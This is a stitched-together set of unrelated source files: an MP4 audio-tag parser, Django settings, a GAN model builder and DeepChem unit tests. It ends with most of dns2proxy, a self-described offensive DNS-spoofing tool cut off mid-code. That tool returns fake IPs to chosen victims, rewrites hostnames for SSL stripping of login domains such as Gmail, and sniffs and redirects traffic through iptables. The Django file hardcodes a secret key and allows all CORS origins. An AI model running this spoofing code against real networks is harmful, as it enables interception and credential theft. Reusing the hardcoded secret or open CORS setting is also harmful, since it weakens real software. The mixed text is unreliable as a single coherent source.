struct.calcsize(fmt) unit, length = struct.unpack(fmt, data[offset:end]) try: self.length = float(length) / unit except ZeroDivisionError: self.length = 0 try: atom = trak[b"mdia", b"minf", b"stbl", b"stsd"] except KeyError: pass else: self._parse_stsd(atom, fileobj) def _parse_stsd(self, atom, fileobj): """Sets channels, bits_per_sample, sample_rate and optionally bitrate. Can raise MP4StreamInfoError. """ assert atom.name == b"stsd" ok, data = atom.read(fileobj) if not ok: raise MP4StreamInfoError("Invalid stsd") try: version, flags, data = parse_full_atom(data) except ValueError as e: raise MP4StreamInfoError(e) if version != 0: raise MP4StreamInfoError("Unsupported stsd version") try: num_entries, offset = cdata.uint32_be_from(data, 0) except cdata.error as e: raise MP4StreamInfoError(e) if num_entries == 0: return # look at the first entry if there is one entry_fileobj = cBytesIO(data[offset:]) try: entry_atom = Atom(entry_fileobj) except AtomError as e: raise MP4StreamInfoError(e) try: entry = AudioSampleEntry(entry_atom, entry_fileobj) except ASEntryError as e: raise MP4StreamInfoError(e) else: self.channels = entry.channels self.bits_per_sample = entry.sample_size self.sample_rate = entry.sample_rate self.bitrate = entry.bitrate self.codec = entry.codec self.codec_description = entry.codec_description def pprint(self): return "MPEG-4 audio (%s), %.2f seconds, %d bps" % ( self.codec_description, self.length, self.bitrate) class MP4(FileType): """An MPEG-4 audio file, probably containing AAC. If more than one track is present in the file, the first is used. Only audio ('soun') tracks will be read. :ivar info: :class:`MP4Info` :ivar tags: :class:`MP4Tags` """ MP4Tags = MP4Tags _mimes = ["audio/mp4", "audio/x-m4a", "audio/mpeg4", "audio/aac"] def load(self, filename): self.filename = filename with open(filename, "rb") as fileobj: try: atoms = Atoms(fileobj) except AtomError as err: reraise(error, err, sys.exc_info()[2]) try: self.info = MP4Info(atoms, fileobj) except error: raise except Exception as err: reraise(MP4StreamInfoError, err, sys.exc_info()[2]) if not MP4Tags._can_load(atoms): self.tags = None else: try: self.tags = self.MP4Tags(atoms, fileobj) except error: raise except Exception as err: reraise(MP4MetadataError, err, sys.exc_info()[2]) def add_tags(self): if self.tags is None: self.tags = self.MP4Tags() else: raise error("an MP4 tag already exists") @staticmethod def score(filename, fileobj, header_data): return (b"ftyp" in header_data) + (b"mp4" in header_data) Open = MP4 def delete(filename): """Remove tags from a file.""" MP4(filename).delete() class MediaKind: MUSIC = [1] AUDIO_BOOK = [2] MUSIC_VIDEO = [6] MOVIE = [9] TV_SHOW = [10] BOOKLET = [11] RINGTONE = [14] class HDVideo: STANDARD = [0] P720 = [1] P1080 = [2] class ContentRating: NONE = [0] CLEAN = [2] EXPLICIT = [4]
""" Django settings for lofiback project. Generated by 'django-admin startproject' using Django 2.0. For more information on this file, see https://docs.djangoproject.com/en/2.0/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/2.0/ref/settings/ """ import os #Права на загруженные файлы FILE_UPLOAD_PERMISSIONS = 0o644 CORS_ORIGIN_WHITELIST = ( 'localhost:3000', '', '.lofichan.ru', 'api.lofichan.ru', 'lofichan.ru', ) CORS_ALLOW_METHODS = ( 'DELETE', 'GET', 'OPTIONS', 'PATCH', 'POST', 'PUT', ) CORS_ALLOW_CREDENTIALS = True # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) LOGGING = { 'version': 1, 'disable_existing_loggers': False, 'handlers': { 'file': { 'level': 'DEBUG', 'class': 'logging.FileHandler', 'filename': 'error.log', }, }, 'loggers': { 'django': { 'handlers': ['file'], 'level': 'DEBUG', 'propagate': True, }, }, 'loggers': { 'django': { 'handlers': ['file'], 'level': 'ERROR', 'propagate': True, }, }, } # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '*(qi2^67--t7g^b#4@amwxlpmawg2a@o^^6zm@pyhvui$44r!$' # # SECURITY WARNING: don't run with debug turned on in production! DEBUG = os.environ.get('S_DEBUG') ALLOWED_HOSTS = ['', 'localhost', '.lofichan.ru', 'api.lofichan.ru', 'lofichan.ru', 'st.lofichan.ru'] CORS_ORIGIN_ALLOW_ALL = True # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'rest_framework', 'corsheaders', 'api', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'corsheaders.middleware.CorsMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'lofiback.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'lofiback.wsgi.application' # Database # https://docs.djangoproject.com/en/2.0/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.postgresql', 'NAME': os.environ.get('DB_NAME_L'), 'USER': os.environ.get('DB_USER'), 'PASSWORD': os.environ.get('DB_PASSWORD'), 'HOST': os.environ.get('DB_HOST'), 'PORT': os.environ.get('DB_PORT') } } # Password validation # https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/2.0/topics/i18n/ LANGUAGE_CODE = 'ru-ru' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/2.0/howto/static-files/ PROJECT_DIR = os.path.dirname(os.path.abspath(__file__)) STATIC_ROOT = os.path.join(PROJECT_DIR, 'templates') STATIC_URL = '/static/' STATICFILES_DIRS = [ os.path.join(BASE_DIR, "templates") ]
# python3.7 """Collects all available models together.""" from .model_zoo import MODEL_ZOO from .pggan_generator import PGGANGenerator from .pggan_discriminator import PGGANDiscriminator from .stylegan_generator import StyleGANGenerator from .stylegan_discriminator import StyleGANDiscriminator from .stylegan2_generator import StyleGAN2Generator from .stylegan2_discriminator import StyleGAN2Discriminator from .stylegan2_gs_generator import StyleGAN2_GS_Generator # from op import FusedLeakyReLU, fused_leaky_relu, upfirdn2d __all__ = [ 'MODEL_ZOO', 'PGGANGenerator', 'PGGANDiscriminator', 'StyleGANGenerator', 'StyleGANDiscriminator', 'StyleGAN2Generator', 'StyleGAN2Discriminator', 'StyleGAN2_GS_Generator', 'build_generator', 'build_discriminator', 'build_model', ] _GAN_TYPES_ALLOWED = ['pggan', 'stylegan', 'stylegan2', 'stylegan2_gs'] _MODULES_ALLOWED = ['generator', 'discriminator'] def build_generator(gan_type, resolution, **kwargs): """Builds generator by GAN type. Args: gan_type: GAN type to which the generator belong. resolution: Synthesis resolution. **kwargs: Additional arguments to build the generator. Raises: ValueError: If the `gan_type` is not supported. NotImplementedError: If the `gan_type` is not implemented. """ if gan_type not in _GAN_TYPES_ALLOWED: raise ValueError(f'Invalid GAN type: `{gan_type}`!\n' f'Types allowed: {_GAN_TYPES_ALLOWED}.') if gan_type == 'pggan': return PGGANGenerator(resolution, **kwargs) if gan_type == 'stylegan': return StyleGANGenerator(resolution, **kwargs) if gan_type == 'stylegan2': return StyleGAN2Generator(resolution, **kwargs) if gan_type == 'stylegan2_gs': return StyleGAN2_GS_Generator(resolution, **kwargs) raise NotImplementedError(f'Unsupported GAN type `{gan_type}`!') def build_discriminator(gan_type, resolution, **kwargs): """Builds discriminator by GAN type. Args: gan_type: GAN type to which the discriminator belong. resolution: Synthesis resolution. **kwargs: Additional arguments to build the discriminator. Raises: ValueError: If the `gan_type` is not supported. NotImplementedError: If the `gan_type` is not implemented. """ if gan_type not in _GAN_TYPES_ALLOWED: raise ValueError(f'Invalid GAN type: `{gan_type}`!\n' f'Types allowed: {_GAN_TYPES_ALLOWED}.') if gan_type == 'pggan': return PGGANDiscriminator(resolution, **kwargs) if gan_type == 'stylegan': return StyleGANDiscriminator(resolution, **kwargs) if gan_type == 'stylegan2': return StyleGAN2Discriminator(resolution, **kwargs) raise NotImplementedError(f'Unsupported GAN type `{gan_type}`!') def build_model(gan_type, module, resolution, **kwargs): """Builds a GAN module (generator/discriminator/etc). Args: gan_type: GAN type to which the model belong. module: GAN module to build, such as generator or discrimiantor. resolution: Synthesis resolution. **kwargs: Additional arguments to build the discriminator. Raises: ValueError: If the `module` is not supported. NotImplementedError: If the `module` is not implemented. """ if module not in _MODULES_ALLOWED: raise ValueError(f'Invalid module: `{module}`!\n' f'Modules allowed: {_MODULES_ALLOWED}.') if module == 'generator': return build_generator(gan_type, resolution, **kwargs) if module == 'discriminator': return build_discriminator(gan_type, resolution, **kwargs) raise NotImplementedError(f'Unsupported module `{module}`!') def parse_gan_type(module): """Parses GAN type of a given module. Args: module: The module to parse GAN type from. Returns: A string, indicating the GAN type. Raises: ValueError: If the GAN type is unknown. """ if isinstance(module, (PGGANGenerator, PGGANDiscriminator)): return 'pggan' if isinstance(module, (StyleGANGenerator, StyleGANDiscriminator)): return 'stylegan' if isinstance(module, (StyleGAN2Generator, StyleGAN2Discriminator)): return 'stylegan2' if isinstance(module, (StyleGAN2_GS_Generator, StyleGAN2Discriminator)): return 'stylegan2_gs' raise ValueError(f'Unable to parse GAN type from type `{type(module)}`!')
import os import unittest import numpy as np from deepchem.utils import rdkit_util from deepchem.utils.fragment_util import get_contact_atom_indices from deepchem.utils.fragment_util import merge_molecular_fragments from deepchem.utils.fragment_util import get_partial_charge from deepchem.utils.fragment_util import strip_hydrogens from deepchem.utils.fragment_util import MolecularFragment from deepchem.utils.fragment_util import AtomShim class TestFragmentUtil(unittest.TestCase): def setUp(self): # TODO test more formats for ligand current_dir = os.path.dirname(os.path.realpath(__file__)) self.protein_file = os.path.join( current_dir, '../../feat/tests/data/3ws9_protein_fixer_rdkit.pdb') self.ligand_file = os.path.join(current_dir, '../../feat/tests/data/3ws9_ligand.sdf') def test_get_contact_atom_indices(self): complexes = rdkit_util.load_complex([self.protein_file, self.ligand_file]) contact_indices = get_contact_atom_indices(complexes) assert len(contact_indices) == 2 def test_create_molecular_fragment(self): mol_xyz, mol_rdk = rdkit_util.load_molecule(self.ligand_file) fragment = MolecularFragment(mol_rdk.GetAtoms(), mol_xyz) assert len(mol_rdk.GetAtoms()) == len(fragment.GetAtoms()) assert (fragment.GetCoords() == mol_xyz).all() def test_strip_hydrogens(self): mol_xyz, mol_rdk = rdkit_util.load_molecule(self.ligand_file) fragment = MolecularFragment(mol_rdk.GetAtoms(), mol_xyz) # Test on RDKit frag = strip_hydrogens(mol_xyz, mol_rdk) def test_merge_molecular_fragments(self): mol_xyz, mol_rdk = rdkit_util.load_molecule(self.ligand_file) fragment1 = MolecularFragment(mol_rdk.GetAtoms(), mol_xyz) fragment2 = MolecularFragment(mol_rdk.GetAtoms(), mol_xyz) joint = merge_molecular_fragments([fragment1, fragment2]) assert len(mol_rdk.GetAtoms()) * 2 == len(joint.GetAtoms()) def test_get_partial_charge(self): from rdkit import Chem mol = Chem.MolFromSmiles("CC") atom = mol.GetAtoms()[0] partial_charge = get_partial_charge(atom) assert partial_charge == 0 def test_atom_shim(self): atomic_num = 5 partial_charge = 1 atom_coords = np.array([0., 1., 2.]) shim = AtomShim(atomic_num, partial_charge, atom_coords) assert shim.GetAtomicNum() == atomic_num assert shim.GetPartialCharge() == partial_charge assert (shim.GetCoords() == atom_coords).all()
#!/usr/bin/python2.6 ''' dns2proxy for offensive cybersecurity v1.0 python dns2proxy.py -h for Usage. Example: python2.6 dns2proxy.py -i eth0 -u -d Example for no forwarding (only configured domain based queries and spoofed hosts): python2.6 dns2proxy.py -i eth0 -noforward Example for no forwarding but add IPs python dns2proxy.py -i eth0 -I,, -noforward Author: Leonardo Nve ( [email protected]) ''' import dns.message import dns.rrset import dns.resolver import socket import numbers import threading from struct import * import datetime import pcapy import os import signal import errno from time import sleep import argparse consultas = {} spoof = {} dominios = {} nospoof = [] nospoofto = [] victims = [] LOGREQFILE = "dnslog.txt" LOGSNIFFFILE = "snifflog.txt" LOGALERTFILE = "dnsalert.txt" RESOLVCONF = "resolv.conf" victim_file = "victims.cfg" nospoof_file = "nospoof.cfg" nospoofto_file = "nospoofto.cfg" specific_file = "spoof.cfg" dominios_file = "domains.cfg" parser = argparse.ArgumentParser() parser.add_argument("-N", "--noforward", help="DNS Fowarding OFF (default ON)", action="store_true") parser.add_argument("-i", "--interface", help="Interface to use", default="eth0") parser.add_argument("-u", "--ip1", help="First IP to add at the response", default=None) parser.add_argument("-d", "--ip2", help="Second IP to add at the response", default=None) parser.add_argument("-I", "--ips", help="List of IPs to add after ip1,ip2 separated with commas", default=None) parser.add_argument("-S", "--silent", help="Silent mode", action="store_true") parser.add_argument("-A", "--adminIP", help="Administrator IP for no filtering", default="") args = parser.parse_args() debug = not args.silent dev = args.interface adminip = args.adminIP ip1 = args.ip1 ip2 = args.ip2 Forward = not args.noforward fake_ips = [] # List of of ips if args.ips is not None: for ip in args.ips.split(","): fake_ips.append(ip) Resolver = dns.resolver.Resolver() ###################### # GENERAL SECTION # ###################### def save_req(lfile, str): f = open(lfile, "a") f.write(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") + ' ' + str) f.close() def SIGUSR1_handle(signalnum, frame): global noserv global Resolver noserv = 0 DEBUGLOG('Reconfiguring....') process_files() Resolver.reset() Resolver.read_resolv_conf(RESOLVCONF) return def process_files(): global nospoof global spoof global nospoof_file global specific_file global dominios_file global dominios global nospoofto_file for i in nospoof[:]: nospoof.remove(i) for i in nospoofto[:]: nospoofto.remove(i) for i in victims[:]: victims.remove(i) dominios.clear() spoof.clear() nsfile = open(nospoof_file, 'r') for line in nsfile: if line[0] == '#': continue h = line.split() if len(h) > 0: DEBUGLOG('Non spoofing ' + h[0]) nospoof.append(h[0]) nsfile.close() nsfile = open(victim_file, 'r') for line in nsfile: if line[0] == '#': continue h = line.split() if len(h) > 0: DEBUGLOG('Spoofing only to ' + h[0]) victims.append(h[0]) nsfile.close() nsfile = open(nospoofto_file, 'r') for line in nsfile: if line[0] == '#': continue h = line.split() if len(h) > 0: DEBUGLOG('Non spoofing to ' + h[0]) nospoofto.append(h[0]) nsfile.close() nsfile = open(specific_file, 'r') for line in nsfile: if line[0] == '#': continue h = line.split() if len(h) > 1: DEBUGLOG('Specific host spoofing ' + h[0] + ' with ' + h[1]) spoof[h[0]] = h[1] nsfile.close() nsfile = open(dominios_file, 'r') for line in nsfile: if line[0] == '#': continue h = line.split() if len(h) > 1: DEBUGLOG('Specific domain IP ' + h[0] + ' with ' + h[1]) dominios[h[0]] = h[1] nsfile.close() return def DEBUGLOG(str): global debug if debug: print str return def handler_msg(id): os.popen('./handler_msg.sh %s >> handler_msg.log 2>> handler_msg_error.log &'%id.replace('`','_').replace(';','_').replace('|','_').replace('&','_')) return ###################### # SNIFFER SECTION # ###################### class ThreadSniffer(threading.Thread): def __init__(self): threading.Thread.__init__(self) def run(self): #DEBUGLOG( self.getName(), " Sniffer Waiting connections....") go() def go(): global ip1 global dev bpffilter = "dst host %s and not src host %s and !(tcp dst port 80 or tcp dst port 443) and (not host %s)" % ( ip1, ip1, adminip) cap = pcapy.open_live(dev, 255, 1, 0) cap.setfilter(bpffilter) DEBUGLOG( "Starting sniffing in (%s = %s)...." % (dev, ip1)) #start sniffing packets while True: try: (header, packet) = cap.next() parse_packet(packet) except: pass #DEBUGLOG( ('%s: captured %d bytes, truncated to %d bytes' %(datetime.datetime.now(), header.getlen(), header.getcaplen()))) #function to parse a packet def parse_packet(packet): eth_length = 14 eth_protocol = 8 global ip1 global consultas global ip2 #Parse IP packets, IP Protocol number = 8 if eth_protocol == 8: #Parse IP header #take first 20 characters for the ip header ip_header = packet[eth_length:20 + eth_length] #now unpack them :) iph = unpack('!BBHHHBBH4s4s', ip_header) version_ihl = iph[0] #version = version_ihl >> 4 ihl = version_ihl & 0xF iph_length = ihl * 4 #ttl = iph[5] protocol = iph[6] s_addr = socket.inet_ntoa(iph[8]) d_addr = socket.inet_ntoa(iph[9]) #TCP protocol if protocol == 6: t = iph_length + eth_length tcp_header = packet[t:t + 20] #now unpack them :) tcph = unpack('!HHLLBBHHH', tcp_header) source_port = tcph[0] dest_port = tcph[1] # sequence = tcph[2] # acknowledgement = tcph[3] # doff_reserved = tcph[4] # tcph_length = doff_reserved >> 4 if consultas.has_key(str(s_addr)): DEBUGLOG(' ==> Source Address : ' + str(s_addr) + ' * Destination Address : ' + str(d_addr)) DEBUGLOG(' Source Port : ' + str(source_port) + ' * Dest Port : ' + str(dest_port)) # print '>>>> '+str(s_addr)+' esta en la lista!!!!.....' comando = 'sh ./IPBouncer.sh %s %s %s %s' % ( ip2, str(dest_port), consultas[str(s_addr)], str(dest_port)) os.system(comando.replace(';','_').replace('|','_').replace('&','_').replace('`','_')) #print '>>>> ' + comando comando = '/sbin/iptables -D INPUT -p tcp -d %s --dport %s -s %s --sport %s --j REJECT --reject-with tcp-reset' % ( ip1, str(dest_port), str(s_addr), str(source_port)) os.system(comando.replace(';','_').replace('|','_').replace('&','_').replace('`','_')) comando = '/sbin/iptables -A INPUT -p tcp -d %s --dport %s -s %s --sport %s --j REJECT --reject-with tcp-reset' % ( ip1, str(dest_port), str(s_addr), str(source_port)) os.system(comando.replace(';','_').replace('|','_').replace('&','_').replace('`','_')) #print '>>>> ' + comando #UDP packets elif protocol == 17: u = iph_length + eth_length #udph_length = 8 #udp_header = packet[u:u + 8] #now unpack them :) #udph = unpack('!HHHH', udp_header) #source_port = udph[0] #dest_port = udph[1] #length = udph[2] #checksum = udph[3] #DEBUGLOG('Source Port : ' + str(source_port) + ' Dest Port : ' + str(dest_port) + ' Length : ' + str(length) + ' Checksum : ' + str(checksum)) #h_size = eth_length + iph_length + udph_length #data_size = len(packet) - h_size #get data from the packet #data = packet[h_size:] ###################### # DNS SECTION # ###################### def respuestas(name, type): global Resolver DEBUGLOG('Query = ' + name + ' ' + type) try: answers = Resolver.query(name, type) except Exception, e: DEBUGLOG('Exception...') return 0 return answers def requestHandler(address, message): resp = None dosleep = False try: message_id = ord(message[0]) * 256 + ord(message[1]) DEBUGLOG('msg id = ' + str(message_id)) if message_id in serving_ids: DEBUGLOG('I am already serving this request.') return serving_ids.append(message_id) DEBUGLOG('Client IP: ' + address[0]) prov_ip = address[0] try: msg = dns.message.from_wire(message) try: op = msg.opcode() if op == 0: # standard and inverse query qs = msg.question if len(qs) > 0: q = qs[0] DEBUGLOG('request is ' + str(q)) save_req(LOGREQFILE, 'Client IP: ' + address[0] + ' request is ' + str(q) + '\n') if q.rdtype == dns.rdatatype.A: DEBUGLOG('Doing the A query....') resp, dosleep = std_A_qry(msg, prov_ip) elif q.rdtype == dns.rdatatype.PTR: #DEBUGLOG('Doing the PTR query....') resp = std_PTR_qry(msg) elif q.rdtype == dns.rdatatype.MX: DEBUGLOG('Doing the MX query....') resp = std_MX_qry(msg) elif q.rdtype == dns.rdatatype.TXT: #DEBUGLOG('Doing the TXT query....') resp = std_TXT_qry(msg) elif q.rdtype == dns.rdatatype.AAAA: #DEBUGLOG('Doing the AAAA query....') resp = std_AAAA_qry(msg) else: # not implemented resp = make_response(qry=msg, RCODE=4) # RCODE = 4 Not Implemented else: # not implemented resp = make_response(qry=msg, RCODE=4) # RCODE = 4 Not Implemented except Exception, e: DEBUGLOG('got ' + repr(e)) resp = make_response(qry=msg, RCODE=2) # RCODE = 2 Server Error DEBUGLOG('resp = ' + repr(resp.to_wire())) except Exception, e: DEBUGLOG('got ' + repr(e)) resp = make_response(id=message_id, RCODE=1) # RCODE = 1 Format Error DEBUGLOG('resp = ' + repr(resp.to_wire())) except Exception, e: # message was crap, not even the ID DEBUGLOG('got ' + repr(e)) if resp: s.sendto(resp.to_wire(), address) if dosleep: sleep(1) # Performance downgrade no tested jet def std_PTR_qry(msg): qs = msg.question DEBUGLOG( str(len(qs)) + ' questions.') iparpa = qs[0].to_text().split(' ', 1)[0] DEBUGLOG('Host: ' + iparpa) resp = make_response(qry=msg) hosts = respuestas(iparpa[:-1], 'PTR') if isinstance(hosts, numbers.Integral): DEBUGLOG('No host....') resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN return resp for host in hosts: DEBUGLOG('Adding ' + host.to_text()) rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.PTR, host.to_text()) resp.answer.append(rrset) return resp def std_MX_qry(msg): qs = msg.question DEBUGLOG(str(len(qs)) + ' questions.') iparpa = qs[0].to_text().split(' ', 1)[0] DEBUGLOG('Host: ' + iparpa) resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN return resp #Temporal disable MX responses resp = make_response(qry=msg) hosts = respuestas(iparpa[:-1], 'MX') if isinstance(hosts, numbers.Integral): DEBUGLOG('No host....') resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN return resp for host in hosts: DEBUGLOG('Adding ' + host.to_text()) rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.MX, host.to_text()) resp.answer.append(rrset) return resp def std_TXT_qry(msg): qs = msg.question print str(len(qs)) + ' questions.' iparpa = qs[0].to_text().split(' ', 1)[0] print 'Host: ' + iparpa resp = make_response(qry=msg) host = iparpa[:-1] punto = host.find(".") dominio = host[punto:] host = "."+host spfresponse = '' if (dominio in dominios) or (host in dominios): ttl = 1 DEBUGLOG('Alert domain! (TXT) ID: ' + host) # Here the HANDLE! #os.popen("python /yowsup/yowsup-cli -c /yowsup/config -s <number> \"Host %s\nIP %s\" > /dev/null &"%(id,prov_ip)); save_req(LOGALERTFILE, 'Alert domain! (TXT) ID: ' + host+ '\n') if host in dominios: spfresponse = "v=spf1 a:mail%s/24 mx -all "%host if dominio in dominios: spfresponse = "v=spf1 a:mail%s/24 mx -all "%dominio DEBUGLOG('Responding with SPF = ' + spfresponse) rrset = dns.rrset.from_text(iparpa, ttl, dns.rdataclass.IN, dns.rdatatype.TXT, spfresponse) resp.answer.append(rrset) return resp hosts = respuestas(iparpa[:-1], 'TXT') if isinstance(hosts, numbers.Integral): print 'No host....' resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN return resp for host in hosts: print 'Adding ' + host.to_text() rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.TXT, host.to_text()) resp.answer.append(rrset) return resp def std_SPF_qry(msg): qs = msg.question print str(len(qs)) + ' questions.' iparpa = qs[0].to_text().split(' ', 1)[0] print 'Host: ' + iparpa resp = make_response(qry=msg) # host = iparpa[:-1] # punto = host.find(".") # dominio = host[punto:] # host = "."+host # if (dominio in dominios) or (host in dominios): # ttl = 1 # DEBUGLOG('Alert domain! (TXT) ID: ' + host) # # Here the HANDLE! # #os.popen("python /yowsup/yowsup-cli -c /yowsup/config -s <number> \"Host %s\nIP %s\" > /dev/null &"%(id,prov_ip)); # save_req(LOGALERTFILE, 'Alert domain! (TXT) ID: ' + host+ '\n') # if host in dominios: spfresponse = "v=spf1 a:mail%s/24 mx -all "%host # if dominio in dominios: spfresponse = "v=spf1 a:mail%s/24 mx -all "%dominio # DEBUGLOG('Responding with SPF = ' + spfresponse) # rrset = dns.rrset.from_text(iparpa, ttl, dns.rdataclass.IN, dns.rdatatype.TXT, spfresponse) # resp.answer.append(rrset) # return resp hosts = respuestas(iparpa[:-1], 'SPF') if isinstance(hosts, numbers.Integral): print 'No host....' resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN return resp for host in hosts: print 'Adding ' + host.to_text() rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.SPF, host.to_text()) resp.answer.append(rrset) return resp def std_AAAA_qry(msg): resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN return resp def std_A_qry(msg, prov_ip): global consultas global ip1 global ip2 global fake_ips dosleep = False qs = msg.question DEBUGLOG(str(len(qs)) + ' questions.') resp = make_response(qry=msg) for q in qs: qname = q.name.to_text()[:-1] DEBUGLOG('q name = ' + qname) host = qname.lower() # dom1 = None # dominio = None # punto1 = host.rfind(".") # punto2 = host.rfind(".",0,punto1-1) # if punto1 > -1: # dom1 = host[punto1:] # if punto2 > -1: # dominio = host[punto2:] find_host = None for d in dominios: if d in host: find_host = d if (find_host is not None): ttl = 1 # id = host[:punto2] # if dom1 in dominios: # id = host[:punto1] # dominio = dom1 DEBUGLOG('Alert domain! ID: ' + host) # Here the HANDLE! #os.popen("python /yowsup/yowsup-cli -c /yowsup/config -s <number> \"Host %s\nIP %s\" > /dev/null &"%(id,prov_ip)); handler_msg(host) save_req(LOGALERTFILE, 'Alert domain! ID: ' + host + '\n') if host not in spoof: DEBUGLOG('Responding with IP = ' + dominios[find_host]) rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, dominios[find_host]) else: DEBUGLOG('Responding with IP = ' + spoof[host]) rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, spoof[host]) resp.answer.append(rrset) return resp, dosleep if ".%s"%host in dominios: dominio = ".%s"%host ttl = 1 DEBUGLOG('Responding with IP = ' + dominios[dominio]) rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, dominios[dominio]) resp.answer.append(rrset) return resp, dosleep ips = respuestas(qname.lower(), 'A') if qname.lower() not in spoof and isinstance(ips, numbers.Integral): # SSLSTRIP2 transformation punto = host.find(".") dominio = host[punto:] host2 = '' if host[:5] == 'wwww.' or host[:7] == 'social.': host2 = 'www%s' % dominio elif host[:3] == 'web': host2 = host[3:] elif host[:7] == 'cuentas': host2 = 'accounts%s' % dominio elif host[:5] == 'gmail': host2 = 'mail%s' % dominio elif host == 'chatenabled.gmail.google.com': # Yes, It is ugly.... host2 = 'chatenabled.mail.google.com' if host2 != '': DEBUGLOG('SSLStrip transforming host: %s => %s ...' % (host, host2)) ips = respuestas(host2, 'A') #print '>>> Victim: %s Answer 0: %s'%(prov_ip,prov_resp) if isinstance(ips, numbers.Integral): DEBUGLOG('No host....') resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN return resp, dosleep prov_resp = ips[0] consultas[prov_ip] = prov_resp ttl = 1 if (host not in nospoof) and (prov_ip not in nospoofto) and (len(victims) == 0 or prov_ip in victims): if host in spoof: save_req(LOGREQFILE, '!!! Specific host (' + host + ') asked....\n') for spoof_ip in spoof[host].split(","): DEBUGLOG('Adding fake IP = ' + spoof_ip) rrset = dns.rrset.from_text(q.name, 1000, dns.rdataclass.IN, dns.rdatatype.A, spoof_ip) resp.answer.append(rrset) return resp, dosleep elif Forward: consultas[prov_ip] = prov_resp #print 'DEBUG: Adding consultas[%s]=%s'%(prov_ip,prov_resp) if ip1 is not None: rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, ip1) DEBUGLOG('Adding fake IP = ' + ip1) resp.answer.append(rrset) if ip2 is not None: #Sleep only when using global resquest matrix dosleep = True rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, ip2) DEBUGLOG('Adding fake IP = ' + ip2) resp.answer.append(rrset) if len(fake_ips)>0: for fip in fake_ips: rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, fip) DEBUGLOG('Adding fake IP = ' + fip) resp.answer.append(rrset) if not Forward and prov_ip not in nospoofto: if len(fake_ips) == 0: DEBUGLOG('No forwarding....') resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN elif len(fake_ips) > 0: DEBUGLOG('No forwarding (but adding fake IPs)...') for fip in fake_ips: rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, fip) DEBUGLOG('Adding fake IP = ' + fip) resp.answer.append(rrset) return resp, dosleep for realip in ips: DEBUGLOG('Adding real IP = ' + realip.to_text()) rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, realip.to_text()) resp.answer.append(rrset) return resp, dosleep # def std_A2_qry(msg): # qs = msg.question # DEBUGLOG(str(len(qs)) + ' questions.') # iparpa = qs[0].to_text().split(' ',1)[0] # print 'Host: '+ iparpa # resp = make_response(qry=msg) # rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.A, '') # resp.answer.append(rrset) # return resp def std_ASPOOF_qry(msg): global spoof qs = msg.question DEBUGLOG(str(len(qs)) + ' questions.') iparpa = qs[0].to_text().split(' ', 1)[0] DEBUGLOG('Host: ' + iparpa) resp = make_response(qry=msg) for q in qs: qname = q.name.to_text()[:-1] DEBUGLOG('q name = ' + qname) + ' to resolve ' + spoof[qname] # rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.facebook.com.') # resp.answer.append(rrset) # rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.yahoo.com.') # resp.answer.append(rrset) # rrset = 